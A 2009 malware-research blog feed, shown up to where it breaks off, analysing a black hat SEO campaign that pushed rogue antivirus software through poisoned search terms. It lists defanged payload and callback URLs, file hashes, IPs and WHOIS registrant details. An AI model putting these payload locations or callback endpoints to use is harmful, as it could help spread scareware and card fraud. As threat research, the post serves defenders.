<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8434732598810973720</id><updated>2011-04-21T17:45:50.722-07:00</updated><category term='email-worm.win32.net'/><category term='zlkon'/><category term='open4scan.com'/><category term='loyaltube'/><category term='pdf malware'/><category term='zbot'/><category term='clarafin-info'/><category term='easynetcheckonline'/><category term='dnschanger'/><category term='initialsecurityscan.com'/><category term='blackhat'/><category term='AntiVirus-Number-1'/><category term='protectionexamine.com'/><category term='av-best.info'/><category term='SystemSecurity2009'/><category term='Malware campaign'/><category term='AntivirusPlus ZlKon'/><category term='loyaldown'/><category term='systemguard2009.com'/><category term='Fake Scanner'/><category term='spbho.dll'/><category term='SpywareGuard2008.exe SystemGuard2009.exe SpywareGuard2008.exe'/><category term='FakeXPA'/><category term='netdirekt ek'/><category term='black hat'/><category term='iframe exploit'/><category term='web based malware'/><category term='mainscan6.com'/><category term='blackhat Rogue Antivirus'/><category term='Win32.SPRFraud.PrivC'/><category term='systemsecurity.exe'/><category term='loyaltube09.com'/><category term='activesecurityshield.com'/><category term='thegreatsecurity.com'/><category term='Rogue Antivirus'/><category term='Anti-Virus-Number-1'/><category term='av-click-site.info'/><category term='malicious script'/><category term='Alureon'/><category term='Win PC Defender'/><category term='scanslot4.com'/><category term='hack website rogue antivirus'/><category term='compromised websites'/><category term='winwebsecurity'/><category term='Malware Defender 2009'/><category term='best-click-scanner.info'/><category term='fake av'/><category term='Rogue Anti-malware'/><category term='Fake-AV'/><category term='malwarescanner20.com'/><category term='Antivirus360'/><category term='drive-by install'/><category term='Admess.Trojan'/><category term='Rogue AntiSpyware'/><category term='compromised website'/><category term='stabilityinetscan.com'/><category term='hs.3-3.zlkon.lv'/><category term='xp police antivirus'/><category term='Antivirus2010'/><category term='fake antivirus software'/><category term='fakeav'/><category term='World Wide Web Consortium hack'/><category term='black hat seo'/><category term='trojan'/><category term='hdddriver.dll'/><category term='Antivirus 2010'/><category term='scanlist4.com'/><category term='Easywinscanner17.com'/><category term='goscanlist.com'/><category term='94.247.3.3'/><category term='AntiSpyware Pro'/><category term='logscan6.com'/><category term='Rootkit TDSS'/><category term='maldef09'/><category term='cybercrime toolkit'/><category term='exploits'/><category term='Spyware Guard 2009'/><category term='scan4open.com'/><category term='Spyware.IEMonster.b'/><category term='getsecuritywall.com'/><category term='worm'/><category term='seo Wordpress'/><category term='scan4any.com'/><category term='internetantiviruspro'/><category term='starline virus'/><category term='RapidAntivirus'/><category term='AntivirusPlus.exe'/><category term='internet anvirius pro'/><category term='Ned.org'/><category term='Privacy components'/><category term='AntiSpyware Pro 2009'/><category term='scan4fuse.com'/><category term='internet antivirus pro'/><category term='sutra cgi'/><category term='malware threats'/><category term='compromised web site'/><category term='tube-funs-world removal'/><category term='internetantivirus'/><category term='Eurohost LLC'/><category term='scanspywareonline.net'/><category term='iframe'/><category term='Netelligent Hosting Services Inc'/><category term='Privacy center removal'/><category term='Scareware'/><category term='antivirus360-protection.com'/><category term='FraudTool AntivirusPlus'/><category term='web threats'/><category term='wayscan4.com'/><category term='scan4lite.com'/><category term='MalwareDefender2009'/><category term='web threat'/><category term='stabilityinetscan'/><category term='UK2 GROUP LTD'/><category term='Wordpress rogue antivirus'/><category term='starline web services'/><category term='spyware'/><category term='scanvistanow.net'/><category term='fake codec'/><category term='Sus/Behav-113'/><category term='Ford Motor'/><category term='online-spyware-scan.net'/><category term='W3C hack'/><category term='sysgd09'/><category term='hs.3-40.zlkon.lv'/><category term='new4scan.info'/><category term='Rogue.Sysguard'/><category term='easynetcheckonline.com'/><category term='Ford Motor scams'/><category term='System Guard 2009'/><category term='web poisoning'/><category term='webnetsafety.com'/><category term='spyware threats'/><category term='browser hijacker'/><category term='hack'/><category term='AntivirusPlus'/><category term='A360.exe'/><category term='AntivirusN1'/><category term='SystemSecurity2009.exe'/><category term='ftp worm'/><category term='mostpopularscan.com'/><category term='A360.exe.tmp'/><category term='central-scan.com'/><category term='SUTRA Traffic Manager'/><category term='trojan insebro'/><category term='SystemGuard2009'/><category term='order_xp.php?ver=1'/><category term='netspywarescan.com'/><category term='hack website'/><category term='malware drop'/><category term='iframe trojans'/><category term='systemsecurity fake antivirus'/><category term='tubeloyaln.com'/><category term='botnet'/><category term='My computer Online Scan'/><category term='Win32.FraudTool.AntivirusPlus'/><category term='rogue'/><category term='MalwareDefender2009.exe'/><category term='protectionskim.com'/><category term='Eurohost'/><category term='Antispywarepro.net'/><category term='rbn'/><category term='loyaldown10.com'/><category term='rogue av'/><category term='IFRAME injected'/><category term='Privacy components removal'/><category term='virus'/><category term='Anti-Virus Number-1'/><category term='massive attack'/><category term='Anti-Virus1'/><category term='Ford black hat'/><category term='MalwareDefender'/><category term='system security antivirus'/><category term='javascript exploit'/><category term='drive-by installs'/><category term='tube-funs-world.com'/><category term='ftp trojan'/><category term='AntiSpyware Pro.exe'/><category term='scanfuse4.com'/><category term='compromised site'/><title type='text'>Malware Web Threats</title><subtitle type='html'>Malware web based threats: Anatomy of a web hack.
Mass compromise of legitimate websites - Blackhat SEO Rogue Antivirus software and zero-day exploits!</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://malware-web-threats.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>32</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-5261609962080268700</id><published>2009-04-24T09:34:00.000-07:00</published><updated>2009-04-24T16:29:03.688-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Rogue Antivirus'/><category scheme='http://www.blogger.com/atom/ns#' term='Ned.org'/><category scheme='http://www.blogger.com/atom/ns#' term='fake antivirus software'/><category scheme='http://www.blogger.com/atom/ns#' term='Ford Motor scams'/><category scheme='http://www.blogger.com/atom/ns#' term='black hat seo'/><category scheme='http://www.blogger.com/atom/ns#' term='Rogue Anti-malware'/><category scheme='http://www.blogger.com/atom/ns#' term='seo Wordpress'/><category scheme='http://www.blogger.com/atom/ns#' term='Ford Motor'/><category scheme='http://www.blogger.com/atom/ns#' term='Ford black hat'/><category scheme='http://www.blogger.com/atom/ns#' term='black hat'/><category scheme='http://www.blogger.com/atom/ns#' term='Wordpress rogue antivirus'/><title type='text'>Black Hat SEO and Rogue Antivirus p.9</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="498" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td width="498" height="833" valign="top"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;The silent threat: Black Hat SEO and Rogue Antivirus&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; Massive black hat campaign still growing: Easter related websites, Ned.org, Ford and more&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;table width="483" height="136" border="0" cellpadding="0" cellspacing="0"&gt;&lt;tr&gt;&lt;td width="483"&gt;&lt;table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"&gt;&lt;tr&gt;&lt;td width="266" height="29"&gt;READ &lt;a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333"&gt;THIS page&lt;/a&gt; if you need more information&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt; After Trend Micro researchers claimed that Easter related sites were used to&lt;br /&gt;redirect visitors to rogue antivirus websites, PandaLabs recently uncovered &lt;br /&gt;similar Black hat SEO attacks against Ford and Ned.org.&lt;br /&gt;&lt;br /&gt;By mis-using  keywords typically related to global businesses and institutions, &lt;br /&gt;the criminals attract unsuspecting visitors to compromized web sites. These sites &lt;br /&gt;deceive visitors into downloading and installing a fake antivirus product that is&lt;br /&gt;very hard to deactivate or remove.The rogue antivirus gives false alerts to the &lt;br /&gt;user making them think that theircomputer is infected. Scared users are then &lt;br /&gt;susceptible to buying the &amp;quot;antivirus protection&amp;quot; via a page that looks like a &lt;br /&gt;secure SSL web site. In fact, their money are confidential credit card information &lt;br /&gt;are stolen by the criminals the moment that they enter their personal information&lt;br /&gt;into the payment page. &lt;br /&gt;&lt;br /&gt;Many global companies, including Ford have been exploited in this way. Over a &lt;br /&gt;million compromized web sites used Ford-based keywords to attract visitors to &lt;br /&gt;fake antivirussites via search engines such as Google (&lt;a href="http://www.brafton.com/industry-news/black-hat-seo-may-force-google-change-algorithm-$1289367.htm" target="_blank"&gt;Black hat SEO may force&lt;br /&gt;Google to change algorithm&lt;/a&gt;).Other examples of this attack include the mis-use&lt;br /&gt;of Easter related keywords to attract unsuspecting visitors during the Easter &lt;br /&gt;season (&lt;u&gt;Trend Micro Malware Blog&lt;/u&gt; -  &lt;a href="http://blog.trendmicro.com/rotten-eggs-an-easter-malware-campaign/"&gt;Rotten Eggs: An Easter Malware Campaign&lt;/a&gt;).&lt;p&gt;There are other variants of this type of attack originating from the same &lt;br /&gt;Ukraine / Russianbased criminal fraternity. For example, the criminals use technical &lt;br /&gt;exploits  to compromizeweb sites, blog, forums and the like. Wordpress blog &lt;br /&gt;management software has been a victim of such an exploit allowing the criminals&lt;br /&gt;to inject malicious code directly into all pages.A visitor to one of these infected&lt;br /&gt;sites will beredirected to another  site where rogue antivirus software is again &lt;br /&gt;downloaded &lt;u&gt; (PandaLabs&lt;/u&gt;: &lt;a href="http://pandalabs.pandasecurity.com/archive/New-Blackhat-SEO-attack-exploits-vulnerabilities-in-Wordpress-to-distribute-rogue-antivirus-software.aspx" target="_blank"&gt;New Blackhat SEO attack exploits vulnerabilities in &lt;br /&gt;Wordpressto distributerogue antivirus software&lt;/a&gt;).&lt;p&gt;The criminals put a lot of effort into assuring the longevity of their scam.&lt;br /&gt;Frequent IP   changes and moving from location to location help ensure that &lt;br /&gt;  they can continue their   activities.&lt;p&gt;You can get more information about all these attacks from the following &lt;br /&gt;resources. The PandaLabs video gives a particularly clear and concise overview.&lt;p&gt;  &lt;object width="400" height="300"&gt;    &lt;param name="allowfullscreen" value="true" /&gt;    &lt;param name="allowscriptaccess" value="always" /&gt;&lt;param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=4143942&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" /&gt;    &lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=4143942&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"&gt;&lt;/embed&gt;  &lt;/object&gt;&lt;p&gt;The following links provide more information about this attack:&lt;br /&gt;  &lt;br /&gt;  &lt;u&gt;The Tech Herald&lt;/u&gt;: &lt;a href="http://www.thetechherald.com/article.php/200916/3450/Malicious-SEO-targets-Ford-Motor-Company" target="_blank"&gt;Malicious SEO targets Ford Motor Company&lt;/a&gt;&lt;u&gt;&lt;br /&gt;    PandaLabs&lt;/u&gt;: &lt;a href="http://pandalabs.pandasecurity.com/archive/Targeted-Blackhat-SEO-Attack-against-Ford-Motor-Co_2E00_.aspx" target="_blank"&gt;Targeted Blackhat SEO Attack against Ford Motor Co.&lt;/a&gt;&lt;br /&gt;    &lt;br /&gt;  Read the article on WebProNews: &lt;a href="http://www.webpronews.com/topnews/2009/04/20/google-set-to-change-ranking-algorithm" target="_blank"&gt;Blackhat SEO spammers force Google’s hand&lt;/a&gt;&lt;br /&gt;&lt;hr /&gt;&lt;p&gt; &lt;u&gt;Related attack:&lt;br /&gt;    &lt;br /&gt;    PandaLabs&lt;/u&gt;: &lt;a href="http://pandalabs.pandasecurity.com/archive/Blackhat-SEO-Fueled-Rogue-Security-Campaign.aspx" target="_blank"&gt;Blackhat SEO Fueled Rogue Security Campaign&lt;/a&gt;&lt;br /&gt;    &lt;a href="http://support.us.pandasecurity.com/blog/list.txt" target="_blank"&gt;Sample hijacked search terms&lt;/a&gt; (text file) &lt;br /&gt;    &lt;br /&gt;    The website implicated is: &lt;span class="scam_website"&gt;getscanonline.com&lt;/span&gt; (also hosted on 209.44.126.14).&lt;br /&gt;    &lt;br /&gt;    &lt;u&gt;Softpedia&lt;/u&gt;: &lt;a href="http://news.softpedia.com/news/Easter-and-Ford-Search-Results-Poisoned-109376.shtml" target="_blank"&gt;Easter and Ford Search Results Poisoned&lt;/a&gt; &lt;br /&gt;    &lt;br /&gt;In this case, the files found on the site are detected by Trend Micro as &lt;br /&gt;&lt;a href="http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_FAKEAV.BAF&amp;amp;VSect=T" target="_blank"&gt;&lt;br /&gt;TROJ_FAKEAV.BAF&lt;/a&gt; - &lt;a href="http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=JS_DLOADER.WKQ&amp;amp;VSect=T" target="_top"&gt;JS_DLOADER.WKQ&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;The websites in question are: &lt;span class="scam_website"&gt;trustsecurityshield.com&lt;/span&gt; and &lt;span class="scam_website"&gt;topsecurity4you.com&lt;/span&gt;&lt;br /&gt;which both have served for only two or three days  (hosted on 209.44.126.14).&lt;br /&gt;  &lt;/p&gt;
              &lt;hr /&gt;
              &lt;br /&gt;  
              Technicals details can be found below&lt;br /&gt;  &lt;br /&gt;&lt;br /&gt;    &lt;u&gt;Vulnerabilities in Wordpress exploited to distribute rogue antivirus software&lt;/u&gt;&lt;br /&gt;    &lt;br /&gt;    Watch the full video: &lt;br /&gt;    &lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SfHqRdm5YDI/AAAAAAAAAa4/R1Inb8MWasU/s1600-h/malicious-website.jpg"&gt;&lt;/a&gt;&lt;br /&gt;    &lt;object width="400" height="300"&gt;      &lt;param name="allowfullscreen" value="true" /&gt;      &lt;param name="allowscriptaccess" value="always" /&gt;      &lt;param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=4288832&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" /&gt;      &lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=4288832&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"&gt;&lt;/embed&gt;    &lt;/object&gt;    &lt;br /&gt;    &lt;br /&gt;    I will take your attention on the video above. &lt;br /&gt;    &lt;br /&gt;    This is a screenshot     at 03:11&lt;br /&gt;    &lt;br /&gt;    If you zoom into it you will see the domain &lt;span class="scam_website"&gt;&amp;quot;load-archive-av-pro.com&amp;quot;.&lt;/span&gt;&lt;br /&gt;    The domain is still active and shared with many other fake scanner websites&lt;br /&gt;like &lt;span class="scam_website"&gt;&amp;quot;antivir-scan-pro-best.com&amp;quot;&lt;/span&gt; for the location of the payload. &lt;br /&gt;&lt;a href="http://wepawet.iseclab.org/view.php?hash=0224dbcb7d367c49e1740e20445a744e&amp;amp;t=1240592593&amp;amp;type=js" target="_blank"&gt;Wepawet Analysis&lt;/a&gt;&lt;br /&gt;    &lt;br /&gt;    &lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SfHqRdm5YDI/AAAAAAAAAa4/R1Inb8MWasU/s1600-h/malicious-website.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SfHqRdm5YDI/AAAAAAAAAa4/R1Inb8MWasU/s320/malicious-website.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328297419882455090" /&gt;&lt;/a&gt;&lt;br /&gt;    &lt;br /&gt;    &lt;br /&gt;    The process:&lt;br /&gt;    &lt;br /&gt;    I will take some words found on Ned.org for example.&lt;br /&gt;    &lt;br /&gt;    &lt;br /&gt;    The google cache: &lt;br /&gt;    &lt;br /&gt;    &lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SfHlMWa1dWI/AAAAAAAAAaw/iP98effUwZ4/s1600-h/KettleVallyLineSong.jpg"&gt;&lt;/a&gt; &lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SfHlMed-0aI/AAAAAAAAAao/kzJT43E7C4E/s1600-h/Ned.org-Malware_Campaign.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 138px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SfHlMed-0aI/AAAAAAAAAao/kzJT43E7C4E/s320/Ned.org-Malware_Campaign.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328291836656013730" /&gt;&lt;/a&gt; &lt;br /&gt;    &lt;br /&gt;    The poisoned keywords: &lt;br /&gt;    &lt;br /&gt;      &amp;quot;Kettle Vally Line Song&amp;quot;&lt;br /&gt;    &lt;br /&gt;    &lt;br /&gt;    The google search:&lt;br /&gt;    &lt;br /&gt;    &lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SfHlMWa1dWI/AAAAAAAAAaw/iP98effUwZ4/s1600-h/KettleVallyLineSong.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 190px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SfHlMWa1dWI/AAAAAAAAAaw/iP98effUwZ4/s320/KettleVallyLineSong.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328291834495333730" /&gt;&lt;/a&gt; &lt;br /&gt;    &lt;br /&gt;    The redirection analysis:&lt;br /&gt;    &lt;br /&gt;    &lt;span class="scam_website"&gt;hxxp://cropperddi.fortunecity.com/6766.html&lt;/span&gt; &lt;br /&gt;    &lt;span class="scam_website"&gt;hxxp://sandbergjbo.fortunecity.com/26894.html&lt;/span&gt; &lt;br /&gt;    &lt;br /&gt;    &lt;a href="http://wepawet.iseclab.org/view.php?hash=fa5c5fea775ed795a7f6bdd131ec5c86&amp;amp;t=1240589203&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt; -&amp;gt; redirect to a traffic management system&lt;br /&gt;    &lt;a href="http://wepawet.iseclab.org/view.php?hash=e47a21c33d6df03738d0dbcfdba418f8&amp;amp;t=1240589619&amp;amp;type=js" target="_blank"&gt;Analysis&lt;/a&gt; -&amp;gt; redirect to a traffic management system &lt;br /&gt;    &lt;br /&gt;    &lt;span class="scam_website"&gt;hxxp://redirxl.com/filt/in.cgi?5&amp;amp;group=5q&lt;/span&gt; &lt;br /&gt;    &lt;br /&gt;    which then    redirect to the malicious site&lt;br /&gt;    &lt;br /&gt;    &lt;span class="scam_website"&gt;hxxp://antivir-scan-pro-best.com/11038/3/&lt;/span&gt; &lt;br /&gt;    &lt;br /&gt;    The payload in located on the same site that appear on the &lt;br /&gt;
              PandaLabs article     
              which is:&lt;br /&gt;    
              &lt;br /&gt;    &lt;span class="scam_website"&gt;hxxp://files.load-archive-av-pro.com/normal/&lt;br /&gt;
              setup_11038_3_1.exe&lt;/span&gt; &lt;br /&gt;    
              &lt;br /&gt;    File size: 104971 bytes &lt;br /&gt;    MD5...: 2a9889219ec9d0124892e5e64eaed2bd&lt;br /&gt;    &lt;br /&gt;    &lt;a href="http://www.virustotal.com/analisis/4e66a86232471aefaa52aa7b4d886ddf" target="_blank"&gt;VirusTotal &lt;/a&gt;&lt;br /&gt;    &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=1151c650ee74a1834913f5939e6f02f4d" target="_blank"&gt;Anubis&lt;/a&gt;&lt;br /&gt;    &lt;br /&gt;    ---------------------------&lt;br /&gt;    &lt;br /&gt;    64.69.32.220&lt;br /&gt;    &lt;br /&gt;    &lt;span class="scam_website"&gt;antivir-scan-pro-best.com&lt;/span&gt; &lt;br /&gt;    &lt;br /&gt;  &lt;p&gt;Registrant:    Lee Brinkman        (leebrinkm@gmail.com)&lt;br /&gt;    4396 Ross Street&lt;br /&gt;    Mount Vernon&lt;br /&gt;    Illinois,62864&lt;br /&gt;    US&lt;br /&gt;    Tel. +001.65746675653&lt;/p&gt;  &lt;p&gt;Creation Date: 17-Apr-2009 &lt;br /&gt;    Expiration Date: 17-Apr-2010&lt;/p&gt;  &lt;p&gt;Domain servers in listed order:&lt;br /&gt;    &lt;span class="scam_website"&gt;ns2.antivir-scan-pro-best.com&lt;br /&gt;      ns1.antivir-scan-pro-best.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;    Registrar: &lt;br /&gt;    DIRECTI INTERNET SOLUTIONS PVT. LTD. &lt;br /&gt;
              D/B/A PUBLICDOMAINREGISTRY.COM&lt;br /&gt;&lt;br /&gt;    Also on this IP - previously used&lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;checker-pc-pro-av.com&lt;/span&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;sheck-pro-as.com&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/SfH1TrxqlnI/AAAAAAAAAbA/nj9tRQ7Ni-g/s1600-h/64.69.32.220.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 79px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/SfH1TrxqlnI/AAAAAAAAAbA/nj9tRQ7Ni-g/s320/64.69.32.220.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328309552673363570" /&gt;&lt;/a&gt; &lt;br /&gt;  &lt;/p&gt;---------------------------&lt;br /&gt;&lt;br /&gt;195.88.80.127 - ECOWEB AS35695 - ecoweb.lv &lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;load-archive-av-pro.com&lt;/span&gt; &lt;br /&gt;&lt;span class="scam_website"&gt;files.load-archive-av-pro.com&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;&lt;p&gt;Registrant:Mary Smalls        (mary.sma0@gmail.com)&lt;br /&gt;2251 Doctors Drive&lt;br /&gt;Los Angeles&lt;br /&gt;California,90066&lt;br /&gt;US&lt;br /&gt;Tel. +001.86758776498&lt;/p&gt;&lt;p&gt;Creation Date: 17-Apr-2009 &lt;br /&gt;Expiration Date: 17-Apr-2010&lt;/p&gt;&lt;p&gt;Domain servers in listed order:&lt;br /&gt;&lt;span class="scam_website"&gt; ns2.load-archive-av-pro.com&lt;br /&gt;  ns1.load-archive-av-pro.com&lt;/span&gt;&lt;/p&gt;Registrar: &lt;br /&gt;              DIRECTI INTERNET SOLUTIONS PVT. 
              LTD. &lt;br /&gt;
              D/B/A PUBLICDOMAINREGISTRY.COM&lt;br /&gt;&lt;br /&gt;Also on this IP - previously used&lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;download-pro-as.net&lt;br /&gt;load-antivir-pro-pc.com&lt;br /&gt;files.load-antivir-pro-pc.com &lt;br /&gt;download-pro-as.net&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/SfH2HYaxJCI/AAAAAAAAAbI/h-23PrUxteo/s1600-h/195.88.80.127.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 77px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/SfH2HYaxJCI/AAAAAAAAAbI/h-23PrUxteo/s320/195.88.80.127.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328310440830247970" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;
              &lt;hr /&gt;
              &lt;br /&gt;&lt;p&gt;From the article on PandaLabs' blog about the SEO attack against &lt;br /&gt;
                Ford Motor Co. 
                you can see the domain &amp;quot;globextubes.com&amp;quot; &lt;br /&gt;
                previously hosted on 64.69.32.203. &lt;br /&gt;
                &lt;br /&gt;This is a graph (from Robtex) of some of these sites serving in &lt;br /&gt;
                the same campaign:&lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;fasttube2009.com&lt;br /&gt;  globalstube2009.com &lt;br /&gt;  globextubes.com &lt;br /&gt;  streamingtubes2009.com&lt;br /&gt;  &lt;/span&gt; &lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SfHYPSAqfNI/AAAAAAAAAag/lq9vnYHWjPQ/s1600-h/globextubes-com.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 190px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SfHYPSAqfNI/AAAAAAAAAag/lq9vnYHWjPQ/s320/globextubes-com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5328277591200267474" /&gt;&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SfHYPSAqfNI/AAAAAAAAAag/lq9vnYHWjPQ/s1600-h/globextubes-com.jpg"&gt;&lt;br /&gt;  &lt;/a&gt;This is a file found on one of these site: softwarefortubeview.40011.exe&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/b9ea2d9d4de565169edefc76ba5a4f41" target="_blank"&gt;VirusTotal Report&lt;/a&gt;&lt;br /&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=108520c93bee5c77409bc8b7bdc146008" target="_blank"&gt;Anubis Report&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Complete analysis below:&lt;br /&gt;&lt;br /&gt;After running it connect to this URL to received additional payloads to inject.&lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;nhgfngfdhngf.com&lt;/span&gt; -  216.240.148.9 &lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=103021a16beecf19b5b45f4d238d8173" target="_blank"&gt;ThreatExpert Report&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="scam_website"&gt;hxxp://nhgfngfdhngf.com/fff9999.php?aid=0&amp;amp;uid=00cd1a40d41d8&lt;br /&gt;cd98f00b204e9800998ecf8427e&amp;amp;os=512&lt;br /&gt;&lt;br /&gt;hxxp://nhgfngfdhngf.com/eee9999.php?aid=0&amp;amp;uid=00cd1a40d41d&lt;br /&gt;8cd98f00b204e9800998ecf8427e&amp;amp;os=512 &lt;br /&gt;&lt;/span&gt; &lt;span class="scam_website"&gt;&lt;br /&gt;(216.240.148.9)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;The page show these URL (Added file info and virustotal report) &lt;br /&gt;&lt;br /&gt;---------------------------------------------------- &lt;br /&gt;&lt;span class="scam_website"&gt;hxxp://images2009best.com/perce/&lt;br /&gt;30f07cdd01ead4f0dd74319d888cfdd9386f80b04bf230&lt;br /&gt;740e19c810803919c83e9c9f487472375ee/70e/perce.jpg &lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;a href="http://www.virustotal.com/analisis/40a7052911f921606d09c46ceb188576" target="_blank"&gt;VirusTotal&lt;/a&gt; - 4/40 (10%)&lt;br /&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=15e23cab221b44bd43dc9a97270ea4f7d&amp;amp;format=html" target="_blank"&gt;Anubis Report&lt;/a&gt;&lt;br /&gt;File size: 94212 bytes &lt;br /&gt;MD5...: e49048a38d0757b92a34dff6fc3b3f74 &lt;br /&gt;&lt;br /&gt;HTTP Activity: &lt;br /&gt;&lt;br /&gt;&lt;textarea name="textarea" cols="45" rows="6"&gt;
216.240.157.91 [imagesrepository.com] 
Request: POST /resolution.php 
88.214.205.8 [zone-searching.com] 
